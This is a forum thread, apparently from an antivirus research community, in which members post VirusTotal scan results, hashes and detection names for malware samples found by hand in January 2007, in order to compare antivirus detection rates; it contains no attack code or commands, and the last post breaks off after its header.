# Antivirus Research 5

## anton_dr

> So, I kept thinking about how to make a more or less objective assessment of antiviruses, and I came up with something. In this thread I ask everyone to post scan results for malware that was caught exclusively by hand, i.e. that the antivirus installed on the computer did not see. That way the sample will be truly random.
> 
> Post in this thread only scan results for files caught by hand on computers.
> 
> *Do not* post scan results for files found on other sites or in collections.
> *Do not* post scan results for files originally found by an antivirus.




Let's continue in a new thread, since new participants have appeared.
The previous topic is here. Its results are in the attached file. Thanks to *Shu_b* for the titanic work  :Smiley:

----------



## borka

> Thanks to *Shu_b* for the titanic work


Shu_b, respect.  :Smiley:

----------


## Winsent

Antivirus	Version	Update	Result

*AntiVir	7.3.0.21	01.08.2007	TR/Dldr.Injloader.A*
Authentium	4.93.8	12.30.2006	no virus found
Avast	4.7.892.0	12.30.2006	no virus found
AVG	386	01.08.2007	no virus found
BitDefender	7.2	01.08.2007	no virus found
*CAT-QuickHeal	9.00	01.08.2007	TrojanDownloader.Agent.aii*
ClamAV	devel-20060426	01.08.2007	no virus found
*DrWeb	4.33	01.08.2007	Trojan.DownLoader.17213
eSafe	7.0.14.0	01.08.2007	suspicious Trojan/Worm*
eTrust-InoculateIT	23.73.107	01.06.2007	no virus found
eTrust-Vet	30.3.3311	01.08.2007	no virus found
*Ewido	4.0	01.08.2007	Downloader.Agent.aii*
Fortinet	2.82.0.0	01.08.2007	no virus found
F-Prot	3.16f	01.05.2007	no virus found
F-Prot4	4.2.1.29	01.05.2007	no virus found
Ikarus	T3.1.0.27	01.08.2007	no virus found
Kaspersky	4.0.2.24	01.08.2007	no virus found
McAfee	4934	01.08.2007	no virus found
Microsoft	1.1904	01.07.2007	no virus found
NOD32v2	1963	01.08.2007	no virus found
*Norman	5.80.02	12.31.2007	W32/Malware
Panda	9.0.0.4	01.07.2007	Suspicious file*
Prevx1	V2	01.08.2007	no virus found
*Sophos	4.13.0	01.05.2007	Mal/Behav-080*
Sunbelt	2.2.907.0	01.05.2007	no virus found
TheHacker	6.0.3.146	01.08.2007	no virus found
UNA	1.83	01.06.2007	no virus found
VBA32	3.11.1	01.08.2007	no virus found
VirusBuster	4.3.19:9	01.08.2007	no virus found

Aditional Information
File size: 23552 bytes
MD5: 073bc4974a0c451b0f1145338f19ef53
SHA1: e1fc27d75f1aee86935554726c103cd30ed56883
packers: UPX
packers: UPX
packers: UPX
norman sandbox: [ General information ]
* **IMPORTANT: PLEASE SEND THE SCANNED FILE TO: [email protected] - REMEMBER TO ENCRYPT IT (E.G. ZIP WITH PASSWORD)**.
* Decompressing UPX.
* File length: 23552 bytes.

[ Process/window information ]
* Modifies other process memory.
* Modifies execution flow of a remote process.

----------


## Winsent

Complete scanning result of "mail.exe", received in VirusTotal at 01.09.2007, 08:17:19 (CET).


Antivirus	Version	Update	Result

*AntiVir	7.3.0.21	01.08.2007	TR/PSW.LdPinch.bjf*
Authentium	4.93.8	12.30.2006	could be a corrupted executable file
Avast	4.7.892.0	12.30.2006	no virus found
*AVG	386	01.08.2007	PSW.Ldpinch.DHV
BitDefender	7.2	01.09.2007	Trojan.PSW.LdPinch.A
CAT-QuickHeal	9.00	01.08.2007	(Suspicious) - DNAScan*
ClamAV	devel-20060426	01.09.2007	no virus found
DrWeb	4.33	01.09.2007	no virus found
*eSafe	7.0.14.0	01.08.2007	Win32.LdPinch.bjf*
eTrust-InoculateIT	23.73.109	01.09.2007	no virus found
eTrust-Vet	30.3.3313	01.09.2007	no virus found
Ewido	4.0	01.08.2007	no virus found
*Fortinet	2.82.0.0	01.09.2007	W32/LdPinch.BJF!tr.pws
F-Prot	3.16f	01.08.2007	Possibly a new variant of W32/CrazyCrunch-based!Maximus*
*F-Prot4	4.2.1.29	01.09.2007	W32/CrazyCrunch-based!Maximus
Ikarus	T3.1.0.27	01.09.2007	Trojan-PSW.Win32.LdPinch.bjf
Kaspersky	4.0.2.24	01.09.2007	Trojan-PSW.Win32.LdPinch.bjf*
McAfee	4934	01.08.2007	no virus found
Microsoft	1.1904	01.09.2007	no virus found
NOD32v2	1963	01.08.2007	no virus found
Norman	5.80.02	12.31.2007	no virus found
Panda	9.0.0.4	01.08.2007	no virus found
Prevx1	V2	01.09.2007	no virus found
Sophos	4.13.0	01.05.2007	no virus found
*Sunbelt	2.2.907.0	01.05.2007	VIPRE.Suspicious
TheHacker	6.0.3.146	01.08.2007	Trojan/PSW.LdPinch.bjf*
UNA	1.83	01.06.2007	no virus found
VBA32	3.11.2	01.08.2007	no virus found
VirusBuster	4.3.19:9	01.08.2007	no virus found

Aditional Information
File size: 32287 bytes
MD5: eabd75799719ea4f61ac13d6e8fb95fb
SHA1: a407ac7ca8fcb44bfeef1b4c31064896a3b48d18
packers: PecBundle, PECompact
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

----------


## Winsent

Complete scanning result of "porno.scr", received in VirusTotal at 01.09.2007, 15:50:08 (CET).


Antivirus	Version	Update	Result

*AntiVir	7.3.0.21	01.09.2007	TR/FwBypass.A.669*
Authentium	4.93.8	12.30.2006	could be a corrupted executable file
Avast	4.7.892.0	12.30.2006	no virus found
AVG	386	01.09.2007	no virus found
*BitDefender	7.2	01.09.2007	BehavesLike:Trojan.FirewallBypass*
CAT-QuickHeal	9.00	01.09.2007	no virus found
ClamAV	devel-20060426	01.09.2007	no virus found
DrWeb	4.33	01.09.2007	no virus found
*eSafe	7.0.14.0	01.09.2007	suspicious Trojan/Worm*
eTrust-InoculateIT	23.73.109	01.09.2007	no virus found
eTrust-Vet	30.3.3313	01.09.2007	no virus found
Ewido	4.0	01.09.2007	no virus found
*Fortinet	2.82.0.0	01.09.2007	suspicious*
F-Prot	3.16f	01.08.2007	no virus found
F-Prot4	4.2.1.29	01.09.2007	no virus found
*Ikarus	T3.1.0.27	01.09.2007	Trojan-PSW.Win32.LdPinch.apk*
Kaspersky	4.0.2.24	01.09.2007	no virus found
McAfee	4934	01.08.2007	no virus found
Microsoft	1.1904	01.09.2007	no virus found
NOD32v2	1966	01.09.2007	no virus found
Norman	5.80.02	12.31.2007	no virus found
Panda	9.0.0.4	01.08.2007	no virus found
Prevx1	V2	01.09.2007	no virus found
Sophos	4.13.0	01.05.2007	no virus found
*Sunbelt	2.2.907.0	01.05.2007	VIPRE.Suspicious*
TheHacker	6.0.3.146	01.08.2007	no virus found
UNA	1.83	01.06.2007	no virus found
VBA32	3.11.2	01.09.2007	no virus found
VirusBuster	4.3.19:9	01.09.2007	no virus found

Aditional Information
File size: 53818 bytes
MD5: 5bf0802a969477b8b87d044abea0fd33
SHA1: 79306b7c7032f6f0ef99de08776d9c3c0aa2a844
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

----------


## Shu_b

Complete scanning result of "avz00006.dta", received in VirusTotal at 01.09.2007, 19:46:15 (CET).
Antivirus	Version	Update	Result
AntiVir	7.3.0.21	01.09.2007	no virus found
Authentium	4.93.8	01.09.2007	no virus found
Avast	4.7.892.0	12.30.2006	no virus found
AVG	386	01.09.2007	Collected.9.AM
BitDefender	7.2	01.09.2007	no virus found
CAT-QuickHeal	9.00	01.09.2007	no virus found
ClamAV	devel-20060426	01.09.2007	no virus found
DrWeb	4.33	01.09.2007	no virus found
eSafe	7.0.14.0	01.09.2007	suspicious Trojan/Worm
eTrust-InoculateIT	23.73.109	01.09.2007	no virus found
eTrust-Vet	30.3.3313	01.09.2007	no virus found
Ewido	4.0	01.09.2007	no virus found
Fortinet	2.82.0.0	01.09.2007	suspicious
F-Prot	3.16f	01.09.2007	no virus found
F-Prot4	4.2.1.29	01.09.2007	no virus found
Ikarus	T3.1.0.27	01.09.2007	no virus found
Kaspersky	4.0.2.24	01.09.2007	no virus found
McAfee	4935	01.09.2007	no virus found
Microsoft	1.1904	01.09.2007	no virus found
*NOD32v2	1967	01.09.2007	a variant of Win32/Spabot.NAC*
Norman	5.80.02	12.31.2007	no virus found
Panda	9.0.0.4	01.09.2007	no virus found
Prevx1	V2	01.09.2007	no virus found
Sophos	4.13.0	01.05.2007	no virus found
Sunbelt	2.2.907.0	01.05.2007	no virus found
TheHacker	6.0.3.146	01.08.2007	no virus found
UNA	1.83	01.09.2007	no virus found
VBA32	3.11.2	01.09.2007	no virus found
VirusBuster	4.3.19:9	01.09.2007	Trojan.DL.Obfusc.Gen.4

Aditional Information
File size: 90624 bytes
MD5: c733ec1bca41bc95c4da11cbe95654f4
SHA1: 82918417039ee57b4071650d42d4692601ee6ae6
packers: UPX

drweb - Trojan.Spambot

----------


## Shu_b

Complete scanning result of "avz00009__1_._ta", received in VirusTotal at 01.10.2007, 08:28:03 (CET).

Antivirus	Version	Update	Result
AntiVir	7.3.0.21	01.09.2007	TR/Drop.WSO.A.2
Authentium	4.93.8	01.09.2007	no virus found
Avast	4.7.892.0	12.30.2006	no virus found
AVG	386	01.09.2007	no virus found
BitDefender	7.2	01.10.2007	Trojan.Downloader.Agent.AEY
CAT-QuickHeal	9.00	01.09.2007	no virus found
ClamAV	devel-20060426	01.09.2007	no virus found
DrWeb	4.33	01.10.2007	Trojan.Fakealert.229
eSafe	7.0.14.0	01.09.2007	Win32.Downloader
eTrust-InoculateIT	23.73.109	01.09.2007	no virus found
eTrust-Vet	30.3.3313	01.09.2007	no virus found
Ewido	4.0	01.09.2007	Adware.WorldSecurityOnline
Fortinet	2.82.0.0	01.10.2007	W32/FakeAlert
F-Prot	3.16f	01.09.2007	no virus found
F-Prot4	4.2.1.29	01.09.2007	no virus found
Ikarus	T3.1.0.27	01.09.2007	no virus found
Kaspersky	4.0.2.24	01.10.2007	not-a-virus:FraudTool.Win32.WorldSecurityOnline.c
McAfee	4935	01.09.2007	FakeAlert-G
Microsoft	1.1904	01.10.2007	no virus found
NOD32v2	1968	01.09.2007	Win32/TrojanDownloader.Zlob
Norman	5.80.02	12.31.2007	no virus found
Panda	9.0.0.4	01.09.2007	Application/AntiVermins
Prevx1	V2	01.10.2007	Generic.Zlob!DL
Sophos	4.13.0	01.05.2007	no virus found
Sunbelt	2.2.907.0	01.05.2007	no virus found
TheHacker	6.0.3.146	01.08.2007	no virus found
UNA	1.83	01.10.2007	no virus found
VBA32	3.11.2	01.09.2007	no virus found
VirusBuster	4.3.19:9	01.09.2007	no virus found

Aditional Information
File size: 20992 bytes
MD5: 75128e61b82c63deacd8f4975a3e1a99
SHA1: 0c91b00ab6a888030bcda451853b7d46e523de2b

----------


## Winsent

Complete scanning result of "setup.exe", received in VirusTotal at 01.10.2007, 19:16:10 (CET).


Antivirus	Version	Update	Result

AntiVir	7.3.0.21	01.09.2007	no virus found
Authentium	4.93.8	01.10.2007	no virus found
Avast	4.7.892.0	12.30.2006	no virus found
AVG	386	01.10.2007	no virus found
BitDefender	7.2	01.10.2007	no virus found
CAT-QuickHeal	9.00	01.10.2007	no virus found
ClamAV	devel-20060426	01.10.2007	no virus found
DrWeb	4.33	01.10.2007	no virus found
eSafe	7.0.14.0	01.10.2007	no virus found
eTrust-InoculateIT	23.73.110	01.10.2007	no virus found
eTrust-Vet	30.3.3316	01.10.2007	no virus found
Ewido	4.0	01.10.2007	no virus found
Fortinet	2.82.0.0	01.10.2007	no virus found
F-Prot	3.16f	01.10.2007	no virus found
F-Prot4	4.2.1.29	01.10.2007	no virus found
Ikarus	T3.1.0.27	01.09.2007	no virus found
Kaspersky	4.0.2.24	01.10.2007	no virus found
McAfee	4935	01.09.2007	no virus found
Microsoft	1.1904	01.10.2007	no virus found
NOD32v2	1970	01.10.2007	no virus found
*Norman	5.80.02	01.10.2007	W32/Malware
Panda	9.0.0.4	01.09.2007	Suspicious file*
Prevx1	V2	01.10.2007	no virus found
Sophos	4.13.0	01.10.2007	no virus found
Sunbelt	2.2.907.0	01.05.2007	no virus found
TheHacker	6.0.3.146	01.08.2007	no virus found
UNA	1.83	01.10.2007	no virus found
VBA32	3.11.2	01.09.2007	no virus found
VirusBuster	4.3.19:9	01.10.2007	no virus found

Aditional Information
File size: 49152 bytes
MD5: 398c8390385d73aefce3712c6420076f
SHA1: 292bd5a7d56982a888272cc8134041c42cafddac
norman sandbox: [ General information ]
* **IMPORTANT: PLEASE SEND THE SCANNED FILE TO: [email protected] - REMEMBER TO ENCRYPT IT (E.G. ZIP WITH PASSWORD)**.
* File length: 49152 bytes.

[ Process/window information ]
* Modifies other process memory.
* Modifies execution flow of a remote process.

----------


## Winsent

Complete scanning result of "Anna.scr", received in VirusTotal at 01.14.2007, 13:40:38 (CET).


Antivirus	Version	Update	Result

*AntiVir	7.3.0.21	01.09.2007	HEUR/Crypted*
Authentium	4.93.8	01.12.2007	no virus found
*Avast	4.7.936.0	01.13.2007	Win32dPinch-NO*
AVG	386	01.13.2007	no virus found
*BitDefender	7.2	01.14.2007	MemScan:Trojan.PWS.PdPinch.L
CAT-QuickHeal	9.00	01.12.2007	(Suspicious) - DNAScan
ClamAV	devel-20060426	01.14.2007	Trojan.Dropper.Agent-106
DrWeb	4.33	01.14.2007	Trojan.PWS.LDPinch.1217
eSafe	7.0.14.0	01.14.2007	Suspicious Trojan/Worm*
eTrust-InoculateIT	23.73.113	01.13.2007	no virus found
eTrust-Vet	30.3.3324	01.12.2007	no virus found
Ewido	4.0	01.14.2007	no virus found
Fortinet	2.82.0.0	01.13.2007	no virus found
F-Prot	3.16f	01.12.2007	no virus found
F-Prot4	4.2.1.29	01.12.2007	no virus found
Ikarus	T3.1.0.27	01.09.2007	no virus found
*Kaspersky	4.0.2.24	01.14.2007	Trojan-PSW.Win32.LdPinch.bfy*
McAfee	4938	01.12.2007	no virus found
*Microsoft	1.1904	01.14.2007	Win32/Ldpinch
NOD32v2	1977	01.13.2007	a variant of Win32/PSW.LdPinch.NCB*
Norman	5.80.02	01.12.2007	no virus found
*Panda	9.0.0.4	01.13.2007	Suspicious file*
Prevx1	V2	01.14.2007	no virus found
*Sophos	4.13.0	01.13.2007	Troj/LdPinch-PZ*
*Sunbelt	2.2.907.0	01.12.2007	VIPRE.Suspicious*
TheHacker	6.0.3.148	01.14.2007	no virus found
UNA	1.83	01.12.2007	no virus found
*VBA32	3.11.2	01.14.2007	MalwareScope.Trojan-PSW.Pinch.1*
VirusBuster	4.3.19:9	01.13.2007	no virus found

Aditional Information
File size: 32256 bytes
MD5: 743b218ce24362d18399d169ac9dccb4
SHA1: bc82515174f5a50e3a8b5704263f16a185e80f94
packers: PECompact
packers: PECOMPACT
packers: PecBundle, PECompact
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

----------


## Winsent

Complete scanning result of "setup.exe", received in VirusTotal at 01.15.2007, 18:19:53 (CET).


Antivirus	Version	Update	Result

AntiVir	7.3.0.21	01.09.2007	no virus found
Authentium	4.93.8	01.15.2007	no virus found
Avast	4.7.936.0	01.15.2007	no virus found
AVG	386	01.15.2007	no virus found
BitDefender	7.2	01.15.2007	no virus found
CAT-QuickHeal	9.00	01.15.2007	no virus found
ClamAV	devel-20060426	01.15.2007	no virus found
DrWeb	4.33	01.15.2007	no virus found
eSafe	7.0.14.0	01.15.2007	no virus found
eTrust-InoculateIT	23.73.113	01.13.2007	no virus found
eTrust-Vet	30.3.3329	01.15.2007	no virus found
*Ewido	4.0	01.15.2007	Downloader.Agent.aii*
Fortinet	2.82.0.0	01.15.2007	no virus found
F-Prot	3.16f	01.15.2007	no virus found
F-Prot4	4.2.1.29	01.12.2007	no virus found
Ikarus	T3.1.0.27	01.09.2007	no virus found
Kaspersky	4.0.2.24	01.15.2007	no virus found
McAfee	4938	01.12.2007	no virus found
Microsoft	1.1904	01.15.2007	no virus found
NOD32v2	1980	01.15.2007	no virus found
*Norman	5.80.02	01.15.2007	W32/Malware*
*Panda	9.0.0.4	01.14.2007	Suspicious file*
Prevx1	V2	01.15.2007	no virus found
Sophos	4.13.0	01.13.2007	no virus found
Sunbelt	2.2.907.0	01.12.2007	no virus found
TheHacker	6.0.3.148	01.14.2007	no virus found
UNA	1.83	01.12.2007	no virus found
*VBA32	3.11.2	01.15.2007	suspected of Trojan-Proxy.Horst.170* (paranoid heuristics)
VirusBuster	4.3.19:9	01.15.2007	no virus found

Aditional Information
File size: 49152 bytes
MD5: 98fe527323b8643dfc97f172c0de5732
SHA1: ff433500cea0f62fc970d88de355025807bf9939
norman sandbox: [ General information ]
* **IMPORTANT: PLEASE SEND THE SCANNED FILE TO: [email protected] - REMEMBER TO ENCRYPT IT (E.G. ZIP WITH PASSWORD)**.
* File length: 49152 bytes.

[ Process/window information ]
* Modifies other process memory.
* Modifies execution flow of a remote process.

----------


## Winsent

Complete scanning result of "Mashka.scr", received in VirusTotal at 01.18.2007, 11:10:32 (CET).


Antivirus	Version	Update	Result

*AntiVir	7.3.0.21	01.17.2007	HEUR/Crypted*
Authentium	4.93.8	01.17.2007	no virus found
Avast	4.7.936.0	01.17.2007	no virus found
AVG	386	01.18.2007	no virus found
*BitDefender	7.2	01.18.2007	MemScan:Trojan.PWS.PdPinch.L
CAT-QuickHeal	9.00	01.17.2007	(Suspicious) - DNAScan*
ClamAV	devel-20060426	01.18.2007	no virus found
DrWeb	4.33	01.18.2007	no virus found
*eSafe	7.0.14.0	01.18.2007	Suspicious Trojan/Worm*
eTrust-InoculateIT	23.73.116	01.18.2007	no virus found
eTrust-Vet	30.3.3334	01.18.2007	no virus found
Ewido	4.0	01.17.2007	no virus found
*Fortinet	2.82.0.0	01.18.2007	suspicious*
F-Prot	3.16f	01.17.2007	no virus found
F-Prot4	4.2.1.29	01.17.2007	no virus found
Ikarus	T3.1.0.27	01.09.2007	no virus found
*Kaspersky	4.0.2.24	01.18.2007	Trojan-PSW.Win32.LdPinch.bkc*
McAfee	4941	01.17.2007	no virus found
Microsoft	1.1904	01.18.2007	no virus found
NOD32v2	1988	01.18.2007	no virus found
Norman	5.80.02	01.17.2007	no virus found
*Panda	9.0.0.4	01.17.2007	Suspicious file*
Prevx1	V2	01.18.2007	no virus found
Sophos	4.13.0	01.17.2007	no virus found
*Sunbelt	2.2.907.0	01.12.2007	VIPRE.Suspicious*
TheHacker	6.0.3.148	01.14.2007	no virus found
UNA	1.83	01.17.2007	no virus found
VBA32	3.11.2	01.17.2007	no virus found
VirusBuster	4.3.19:9	01.18.2007	no virus found

Aditional Information
File size: 33805 bytes
MD5: a1cae0b3e11a5787892ac677f963b1c8
SHA1: ec3d276cffccd9d4ea86389a96b5667f8a678fe0
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

----------


## Зайцев Олег

STATUS: FINISHED
Complete scanning result of "_4.exe", received in VirusTotal at 01.18.2007, 17:39:47 (CET).
Antivirus Version Update Result 
AntiVir 7.3.0.21 01.18.2007 HEUR/Crypted 
Authentium 4.93.8 01.17.2007 could be a corrupted executable file 
Avast 4.7.936.0 01.18.2007  no virus found 
AVG 386 01.18.2007  no virus found 
BitDefender 7.2 01.18.2007  no virus found 
CAT-QuickHeal 9.00 01.17.2007  no virus found 
ClamAV devel-20060426 01.18.2007  no virus found 
DrWeb 4.33 01.18.2007  no virus found 
eSafe 7.0.14.0 01.18.2007 suspicious Trojan/Worm 
eTrust-InoculateIT 23.73.116 01.18.2007  no virus found 
eTrust-Vet 30.3.3334 01.18.2007  no virus found 
Ewido 4.0 01.17.2007  no virus found 
Fortinet 2.82.0.0 01.18.2007  no virus found 
F-Prot 3.16f 01.17.2007  no virus found 
F-Prot4 4.2.1.29 01.18.2007  no virus found 
Ikarus T3.1.0.27 01.09.2007 Trojan-PSW.Win32.LdPinch.apk 
Kaspersky 4.0.2.24 01.18.2007  no virus found 
McAfee 4941 01.17.2007  no virus found 
Microsoft 1.1904 01.18.2007  no virus found 
NOD32v2 1988 01.18.2007  no virus found 
Norman 5.80.02 01.18.2007  no virus found 
Panda 9.0.0.4 01.17.2007 Suspicious file 
Prevx1 V2 01.18.2007  no virus found 
Sophos 4.13.0 01.17.2007  no virus found 
Sunbelt 2.2.907.0 01.12.2007 VIPRE.Suspicious 
TheHacker 6.0.3.149 01.18.2007  no virus found 
UNA 1.83 01.17.2007  no virus found 
VBA32 3.11.2 01.18.2007  no virus found 
VirusBuster 4.3.19:9 01.18.2007 no virus found 

Aditional Information 
File size: 26526 bytes 
MD5: 48ae2a22ffd78b439a9c9ecd861d9104 
SHA1: 4d50dcca103b9bd01e53a1e0ca615fa9ede19e26 
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics. 

According to my analyzer, this is a modification of Pinch.

----------


## anton_dr

From the thread http://virusinfo.info/showthread.php?t=7594

Complete scanning result of "avz00001.dta", received in VirusTotal at 01.20.2007, 14:07:42 (CET).

Antivirus	Version	Update	Result
AntiVir	7.3.0.26	01.20.2007	no virus found
Authentium	4.93.8	01.20.2007	no virus found
Avast	4.7.936.0	01.18.2007	no virus found
AVG	386	01.20.2007	no virus found
*BitDefender	7.2	01.20.2007	Trojan.FatObfus.Gen
CAT-QuickHeal	9.00	01.20.2007	(Suspicious) - DNAScan*
ClamAV	devel-20060426	01.20.2007	no virus found
DrWeb	4.33	01.20.2007	no virus found
eSafe	7.0.14.0	01.20.2007	no virus found
eTrust-InoculateIT	23.73.118	01.20.2007	no virus found
eTrust-Vet	30.3.3336	01.19.2007	no virus found
Ewido	4.0	01.19.2007	no virus found
*Fortinet	2.82.0.0	01.20.2007	suspicious*
F-Prot	3.16f	01.20.2007	no virus found
F-Prot4	4.2.1.29	01.19.2007	no virus found
*Ikarus	T3.1.0.27	01.09.2007	not-a-virus:AdWare.Win32.Lop.ag*
Kaspersky	4.0.2.24	01.20.2007	no virus found
McAfee	4943	01.19.2007	no virus found
Microsoft	1.1904	01.20.2007	no virus found
NOD32v2	1992	01.20.2007	no virus found
Norman	5.80.02	01.19.2007	no virus found
*Panda	9.0.0.4	01.20.2007	Suspicious file
Prevx1	V2	01.20.2007	Adware.Lop*
Sophos	4.13.0	01.20.2007	no virus found
Sunbelt	2.2.907.0	01.12.2007	no virus found
TheHacker	6.0.3.151	01.19.2007	no virus found
UNA	1.83	01.19.2007	no virus found
*VBA32	3.11.2	01.19.2007	suspected of Trojan-Downloader.Obfuscated.1 (paranoid heuristics)*
VirusBuster	4.3.19:9	01.20.2007	no virus found

Aditional Information
File size: 228864 bytes
MD5: 308dd917c8c1cab36df22b25e95c0df1
SHA1: 7bd08b83f5ac23065c049770a459256f1a8fdcdb
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PXC=614c69782788

----------


## Geser

AntiVir 7.3.0.26 01.20.2007 TR/PCK.Klone.V.6 
Authentium 4.93.8 01.20.2007  no virus found 
Avast 4.7.936.0 01.18.2007  no virus found 
AVG 386 01.20.2007 Generic2.MUX 
BitDefender 7.2 01.20.2007 Trojan.Klone.H 
CAT-QuickHeal 9.00 01.20.2007  no virus found 
ClamAV devel-20060426 01.20.2007  no virus found 
DrWeb 4.33 01.20.2007 Trojan.Mezzia 
eSafe 7.0.14.0 01.20.2007 Win32.Klone.v 
eTrust-InoculateIT 23.73.118 01.20.2007 Win32/Nebuler.AO!DLL!Trojan 
eTrust-Vet 30.3.3336 01.19.2007 Win32/Nebuler.AO 
Ewido 4.0 01.20.2007 Trojan.Agent.nff 
Fortinet 2.82.0.0 01.20.2007 W32/Nebule.V!tr 
F-Prot 3.16f 01.20.2007  no virus found 
F-Prot4 4.2.1.29 01.20.2007  no virus found 
Ikarus T3.1.0.27 01.09.2007 Trojan.Win32.Agent.vg 
Kaspersky 4.0.2.24 01.20.2007 Packed.Win32.Klone.v 
McAfee 4943 01.19.2007 BackDoor-CVT 
Microsoft 1.1904 01.20.2007  no virus found 
NOD32v2 1992 01.20.2007 Win32/Agent.NFF 
Norman 5.80.02 01.19.2007 W32/Agent.AUNX 
Panda 9.0.0.4 01.20.2007 Trj/Nebule.B 
Prevx1 V2 01.20.2007 Polynomial.Code.Exploit 
Sophos 4.13.0 01.20.2007 Troj/Nebule-Gen 
Sunbelt 2.2.907.0 01.12.2007 Trojan.Klone.H 
TheHacker 6.0.3.151 01.19.2007 Trojan/Klone.v 
UNA 1.83 01.19.2007 Trojan.Win32.Klone.2C6C 
VBA32 3.11.2 01.19.2007 Trojan.Win32.Agent.NFF

----------


## ISO

Complete scanning result of "r57.pl", received in VirusTotal at 01.22.2007, 09:39:18 (CET).
Antivirus	Version	Update	Result
AntiVir	7.3.0.26	01.22.2007	no virus found
Authentium	4.93.8	01.21.2007	no virus found
Avast	4.7.936.0	01.18.2007	no virus found
AVG	386	01.22.2007	no virus found
BitDefender	7.2	01.22.2007	no virus found
CAT-QuickHeal	9.00	01.22.2007	no virus found
ClamAV	devel-20060426	01.21.2007	no virus found
DrWeb	4.33	01.22.2007	Exploit.phpBB
eSafe	7.0.14.0	01.21.2007	no virus found
eTrust-InoculateIT	23.73.119	01.22.2007	no virus found
eTrust-Vet	30.3.3343	01.22.2007	no virus found
Ewido	4.0	01.21.2007	no virus found
Fortinet	2.82.0.0	01.22.2007	no virus found
F-Prot	3.16f	01.21.2007	no virus found
F-Prot4	4.2.1.29	01.21.2007	no virus found
Ikarus	T3.1.0.27	01.09.2007	no virus found
Kaspersky	4.0.2.24	01.22.2007	Exploit.Perl.Board.c
McAfee	4943	01.19.2007	Perl/Exploit.gen
Microsoft	1.1904	01.22.2007	no virus found
NOD32v2	1995	01.21.2007	no virus found
Norman	5.80.02	01.22.2007	no virus found
Panda	9.0.0.4	01.21.2007	no virus found
Prevx1	V2	01.22.2007	no virus found
Sophos	4.13.0	01.20.2007	no virus found
Sunbelt	2.2.907.0	01.22.2007	no virus found
TheHacker	6.0.3.154	01.22.2007	no virus found
UNA	1.83	01.19.2007	no virus found
VBA32	3.11.2	01.22.2007	no virus found
VirusBuster	4.3.19:9	01.21.2007	no virus found

Aditional Information
File size: 16761 bytes
MD5: 3175fc5b7fea821faf3b620bf15bee33
SHA1: bf9a27982b610fed8c02c45e2c4704f2b8d6fd55

----------


## ISO

Complete scanning result of "phpRemoteView.php", received in VirusTotal at 01.22.2007, 09:31:40 (CET).
Antivirus	Version	Update	Result
AntiVir	7.3.0.26	01.22.2007	no virus found
Authentium	4.93.8	01.21.2007	no virus found
Avast	4.7.936.0	01.18.2007	no virus found
AVG	386	01.22.2007	no virus found
BitDefender	7.2	01.22.2007	no virus found
CAT-QuickHeal	9.00	01.22.2007	no virus found
ClamAV	devel-20060426	01.21.2007	no virus found
DrWeb	4.33	01.22.2007	no virus found
eSafe	7.0.14.0	01.21.2007	Win32.Hacktool
eTrust-InoculateIT	23.73.119	01.22.2007	no virus found
eTrust-Vet	30.3.3343	01.22.2007	no virus found
Ewido	4.0	01.21.2007	no virus found
Fortinet	2.82.0.0	01.22.2007	RAT/RemView
F-Prot	3.16f	01.21.2007	no virus found
F-Prot4	4.2.1.29	01.21.2007	no virus found
Ikarus	T3.1.0.27	01.09.2007	no virus found
Kaspersky	4.0.2.24	01.22.2007	not-a-virus:RemoteAdmin.PHP.RemView.a
McAfee	4943	01.19.2007	no virus found
Microsoft	1.1904	01.22.2007	no virus found
NOD32v2	1995	01.21.2007	PHP/RemoteAdmin.RemView.A
Norman	5.80.02	01.22.2007	no virus found
Panda	9.0.0.4	01.21.2007	no virus found
Prevx1	V2	01.22.2007	no virus found
Sophos	4.13.0	01.20.2007	no virus found
Sunbelt	2.2.907.0	01.22.2007	no virus found
TheHacker	6.0.3.154	01.22.2007	no virus found
UNA	1.83	01.19.2007	no virus found
VBA32	3.11.2	01.22.2007	no virus found
VirusBuster	4.3.19:9	01.21.2007	no virus found

Aditional Information
File size: 91159 bytes
MD5: b4a09911a5b23e00b55abe546ded691c
SHA1: 9a5f1bd37fa992b69bbc3f2e8ddfc18cb27c8ea3

----------


## ISO

Complete scanning result of "fsb2.exe", received in VirusTotal at 01.22.2007, 17:12:26 (CET).
Antivirus	Version	Update	Result
AntiVir	7.3.0.26	01.22.2007	HEUR/Crypted
Authentium	4.93.8	01.21.2007	no virus found
Avast	4.7.936.0	01.22.2007	no virus found
AVG	386	01.22.2007	no virus found
BitDefender	7.2	01.22.2007	DeepScan:Generic.Dialer.61C27394
CAT-QuickHeal	9.00	01.22.2007	(Suspicious) - DNAScan
ClamAV	devel-20060426	01.22.2007	no virus found
DrWeb	4.33	01.22.2007	no virus found
eSafe	7.0.14.0	01.21.2007	suspicious Trojan/Worm
eTrust-InoculateIT	23.73.119	01.22.2007	no virus found
eTrust-Vet	30.3.3343	01.22.2007	no virus found
Ewido	4.0	01.22.2007	no virus found
Fortinet	2.82.0.0	01.22.2007	suspicious
F-Prot	3.16f	01.21.2007	no virus found
F-Prot4	4.2.1.29	01.21.2007	generic
Ikarus	T3.1.0.27	01.22.2007	no virus found
Kaspersky	4.0.2.24	01.22.2007	no virus found
McAfee	4944	01.22.2007	no virus found
Microsoft	1.1904	01.22.2007	no virus found
NOD32v2	1997	01.22.2007	Win32/PSW.LdPinch.BFP
Norman	5.80.02	01.22.2007	no virus found
Panda	9.0.0.4	01.22.2007	Suspicious file
Prevx1	V2	01.22.2007	no virus found
Sophos	4.13.0	01.20.2007	no virus found
Sunbelt	2.2.907.0	01.22.2007	VIPRE.Suspicious
TheHacker	6.0.3.154	01.22.2007	no virus found
UNA	1.83	01.19.2007	no virus found
VBA32	3.11.2	01.22.2007	MalwareScope.Trojan-PSW.Pinch.1
VirusBuster	4.3.19:9	01.22.2007	no virus found

Aditional Information
File size: 36320 bytes
MD5: 902499f4ad65093eaa9ae4fefa115235
SHA1: 87364cc8107af30b2a42ccd3b6565662cf33146b
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

----------


## ISO

Complete scanning result of "patch.exe", received in VirusTotal at 01.22.2007, 17:23:45 (CET).
Antivirus	Version	Update	Result
